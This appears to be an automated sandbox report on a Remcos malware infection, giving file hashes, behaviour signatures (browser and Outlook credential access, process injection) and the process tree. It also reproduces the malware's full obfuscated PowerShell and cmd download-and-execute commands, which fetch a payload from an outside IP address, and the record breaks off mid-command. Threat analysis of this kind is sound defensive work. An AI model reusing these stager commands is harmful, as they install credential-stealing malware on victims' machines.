| SHA512 | 90ad6b98153ca6bd7c2e2c49451c50fbb6b54f6f88d842cd8af1f3e734000d8235ddedd754842954b9cf57c8ef6dadd3713ff42b6ea549e67e262636c7cda48e |
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
| MD5 | 7788462fff77921361629f1053e761ec |
| SHA1 | 9414413ddaa18d38c3f7cd7119e1958e8afcb5df |
| SHA256 | fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753 |
| SHA512 | e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4b9cdd69393a2f442716a5f8fde8629a |
| SHA1 | b72d9c9d2f884cf379975227f2179b1a0b5e629d |
| SHA256 | 3ad20b54cbb977d2e74d4a8a84e81b4d7b77d2dbf6bfd85a2cd8bb48755e4214 |
| SHA512 | e202d20d077383f776198b8f7a4904ddf9897eb88208cf23c832347c8502aac025f72318365bac6c86156e6768cece159eca9dbba1734e086499fadc17c0522a |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-07 06:53
Reported
2024-08-07 06:55
Platform
win10v2004-20240802-en
Max time kernel
147s
Max time network
133s
Command Line
Signatures
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 412 set thread context of 4804 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 2664 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 3136 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4804 set thread context of 3168 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\367299f3b78921590e30252fcc114cc7.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qhsluqks\qhsluqks.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9877.tmp" "c:\Users\Admin\AppData\Local\Temp\qhsluqks\CSC808E1BBE59894277B6474D5926CDD25.TMP"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴dwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBE≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dwBu≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴R≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQ≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴aw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BX≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴aQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LQBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴JwBG≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bwB3≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bm≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴B9≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBu≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴ZQBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴UwB5≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴LgBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴RQBu≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴bwBk≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴Og≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴FU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Dg≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ 